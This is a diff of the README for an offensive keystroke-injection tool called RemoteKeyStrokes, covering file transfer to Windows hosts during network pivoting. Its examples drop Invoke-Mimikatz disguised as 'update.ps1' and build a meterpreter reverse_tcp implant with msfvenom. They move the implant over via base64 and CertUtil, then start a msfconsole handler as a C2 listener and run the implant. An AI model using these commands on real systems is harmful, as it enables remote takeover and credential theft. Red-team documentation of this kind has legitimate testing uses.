U53RW4R3/RemoteKeyStrokes/README.md

 |  `outfileb64`  |      Windows      | Uses `Out-File` cmdlet to output the encoded base64 file's content then decodes it with `CertUtil.exe`. |
 |    `copycon`   |      Windows      | Uses `copy con` command to output the text file. |

-- Transfer a file remotely when pivoting in a isolated network.
+Transfer a file remotely when pivoting in a isolated network.
 If you want to specify the remote path on windows be sure to include quotes.
 By default it uses Powershell base64 to transfer files if not specified.
 This also includes droppers even if the size is large.
 Bear in mind it'll take time to complete the file transfer.

 ```
-$ ./rks.sh -c "powershell.exe" -m dialogbox
+$ rks -c "powershell.exe" -m dialogbox

-$ ./rks.sh -i Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m pwshb64
+$ rks -i Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m pwshb64
 [*] Transferring file...
 [+] File transferred!
 ```

-- To transfer droppers you can use `CertUtil.exe` base64 especially if it's large.
+To transfer droppers you can use `CertUtil.exe` base64 especially if it's large.

 `$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<IP> lport=4444 -f exe -o implant.exe`

-- For powershell.
+For powershell.

 ```
-$ ./rks.sh -c "powershell.exe" -m dialogbox
+$ rks -c "powershell.exe" -m dialogbox

-$ ./rks.sh -i implant.exe -o implant.exe -m outfileb64
+$ rks -i implant.exe -o implant.exe -m outfileb64
 ```

-- It's also possible for legacy operating systems to transfer files such as, **Windows XP** that lacks powershell except for command prompt.
+It's also possible for legacy operating systems to transfer files such as, **Windows XP** that lacks powershell except for command prompt.

 ```
-$ ./rks.sh -c "cmd.exe" -m dialogbox
+$ rks -c "cmd.exe" -m dialogbox

-$ ./rks.sh -i implant.exe -o implant.exe -m cmdb64
+$ rks -i implant.exe -o implant.exe -m cmdb64
 ```

-- Activate your C2 listener and execute the implant
+Activate your C2 listener and execute the implant.

 ```
 $ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp set lhost <IP>; set lport 4444; exploit"

-$ ./rks.sh -c ".\implant.exe"
+$ rks -c ".\implant.exe"
 ```

 ### 0x04 - Privilege Escalation